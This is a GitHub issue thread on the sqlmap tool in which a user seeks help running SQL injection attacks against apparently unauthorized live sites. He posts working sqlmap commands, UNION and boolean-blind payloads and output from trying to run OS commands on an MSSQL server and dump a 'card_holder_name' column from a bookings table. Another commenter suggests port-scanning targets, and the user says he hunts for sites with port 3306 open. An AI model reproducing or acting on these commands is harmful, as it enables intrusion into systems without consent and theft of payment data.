### ISSUE TITLE
[CRITICAL] unable to execute operating system commands via the back-end DBMS

### ISSUE THREAD

**Issue by AVR1234** [sqlmapproject/sqlmap#2178]
Hello, could you explain me pls what does it meen this error and what can i change in comnnad that this error delete. THANKS!

./sqlmap.py -u http://www.site.com/category.asp?category_id=6 --os-cmd -v l
[00:54:07] [INFO] resuming back-end DBMS 'microsoft sql server'
[00:54:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category_id=6 AND 2290=2290
---
[00:54:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[00:54:08] [CRITICAL] unable to execute operating system commands via the back-end DBMS

[*] shutting down at 00:54:08

**Comment by stamparm** [comment]
Stack-based SQLi is not detected at the backend. I believe that you've been warned here and there for this in previous runs

**Comment by AVR1234** [comment]
Did I understand you correctly, that equipment should always be turned "S" (--technique = S) to the --os--cmd parameter working?

**Comment by AVR1234** [comment]
I meen if for technique  S i am finding host and this host has been vulnerebelity that parametr --os-cmd will be work?

**Comment by stamparm** [comment]
No. That's just a prerequisite. Other prerequisite is that the running user has to be DBA. Third prerequisite is that there is a writeable place for dropping shell files. There are lots of prerequisites in short.

**Comment by AVR1234** [comment]
Thanks! if you say me where can i read about using sqlmap with all function with example will be very great?

Because i only start learn your program and for me very very interest it

**Comment by stamparm** [comment]
https://github.com/sqlmapproject/sqlmap/wiki/Usage

**Comment by AVR1234** [comment]
very BIGGEST THANKS!!))))

**Comment by AVR1234** [comment]
Hi i want to ask, what parametr of sqlmap try to add if date in column 'NULL' (not shown), TYPE  COLUMN varchar(250)?

**Comment by stamparm** [comment]
sorry, couldn't understand you. if retrieved data is NULL, there is a huge possibility that it is indeed NULL

**Comment by AVR1234** [comment]
See pls,also i am testing this --parse-errors --no-cast and --flush-session
I just want understand why if have info about payment i meet NULL date?
root@srv2:~/sqlmap# ./sqlmap.py -u http://www.site.com/home.php?pageid=7 --random-agent --technique=BU -D careers_livedb -T tbl_bookings -C card_holder_name --dump
         _
 ___ ___| |_____ ___ ___  {1.0.9.20#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:47:43

[00:47:43] [INFO] fetched random HTTP User-Agent header from file '/root/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0'
[00:47:44] [INFO] resuming back-end DBMS 'mysql'
[00:47:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pageid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageid=7 AND 8429=8429

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: pageid=-7691 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627071,0x6a4b4761535753545151474a6b6845655652615249724f68646b566f414f5279564f597872755571,0x71626a7a71),NULL,NULL,NULL-- DKYO
---
[00:47:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.44
back-end DBMS: MySQL 5
[00:47:45] [INFO] fetching entries of column(s) 'card_holder_name' for table 'tbl_bookings' in database 'careers_livedb'
[00:47:45] [INFO] the SQL query used returns 733 entries
[00:47:46] [INFO] retrieved:
[00:47:47] [INFO] retrieved:
[00:47:47] [INFO] retrieved:
[00:47:48] [INFO] retrieved:
[00:47:48] [INFO] retrieved:

**Comment by stamparm** [comment]
Really don't know from this data you've given. Please make a traffic file (`-t traffic.txt`) and inspect its content. There are lots and lots of reasons why this would fail, while 90% of those have nothing to do with sqlmap

**Comment by AVR1234** [comment]
HTTP request [#1]:
GET /home.php?pageid=7 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Opera/9.25 (Windows NT 5.1; U; de)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.site.com
Pragma: no-cache
Cache-control: no-cache,no-store
Connection: close

HTTP response [#1] (200 OK):
Content-encoding: gzip
X-powered-by: PHP/5.4.44
Transfer-encoding: chunked
Set-cookie: __cfduid=d7d5bf5b87f23308c466928c73a5b80ec1474927365; expires=Tue, 26-Sep-17 22:02:45 GMT; path=/; domain=.site.com; HttpOnly, PHPSESSID=bf60e0972bbbeff157cb0d2cd6a9ed62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Uri: http://www.site.com:80/home.php?pageid=7
Server: cloudflare-nginx
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 26 Sep 2016 22:02:45 GMT
Cf-ray: 2e8a0080b3fc4e6c-DME
Content-type: text/html

**Comment by stamparm** [comment]
`Server: cloudflare-nginx` <- so, you are attacking a cloudflare protected site and you are asking what's going on :))). you've also most probably been warned about potential IDS/IPS/WAF and/or Captcha along the way. if true, I really don't understand why are you rising this kind of questions???

**Comment by AVR1234** [comment]
because i am study and nobody ask)) thanks will be know now)

**Comment by stamparm** [comment]
@AVR1234 I am really interested into user psychology. I've really made a hard work to help users like yourself to get lots of CRITICAL and WARNING messages with lots of bold messages and at the end I see that I failed. Is there anything else that I could do, like write CRITICAL messages for tens of times or similar?

**Comment by AVR1234** [comment]
thank you so much for your programm, your programm is very easy for using but every time when i am run sqlmap for different website i open new things. If you write more example this any parametr will be little bit easy for studing...

**Comment by AVR1234** [comment]
and links what need to read befor using sqlmap))

**Comment by stamparm** [comment]
I believe that I've already sent you a link to https://github.com/sqlmapproject/sqlmap/wiki/Usage. Also, when you Google for "sqlmap tutorial" you'll get something like 119.000 results. It is really absurd from you to ask for more. No more replies...

**Comment by AVR1234** [comment]
Bro sorry for spending your time!  ofcouse i search a lot of info about sqlmap, but if have really a lot of information - starting misstake, i tell you about https://github.com/sqlmapproject/sqlmap/wiki/Usage. more example, only one place and for me will be easy to study sqlmap. But THIS IS MY MIND and another one thanks for help and thanks for your programm!

**Comment by SweetSoul** [comment]
@AVR1234 i suggest you start studying the Target db for make sure that you know what you can do to achieve the desired results... Because If you want some help, it would be easier for you to ask for it knowing your Target.... Just a tip, take it or leave it... No regrets... :Smile:
Another tip is to scan the target with another tools for open ports... Usually databases need open Doors ;)... Not 100% sure, but it can help...

@stamparm Sorry dude... I was an a***ole.. Will not do it again...

**Comment by AVR1234** [comment]
))) thanks bro, i already search website where open port 3306:) 
ps never mind:)

**Comment by jeffrycascate** [comment]
hi classmate, i had similar case con sqlmap, of the options "--os-shell" not work, but if you make clone official report, work!!!, please try it is.
I leave lik of the report "https://github.com/sqlmapproject/sqlmap.git"
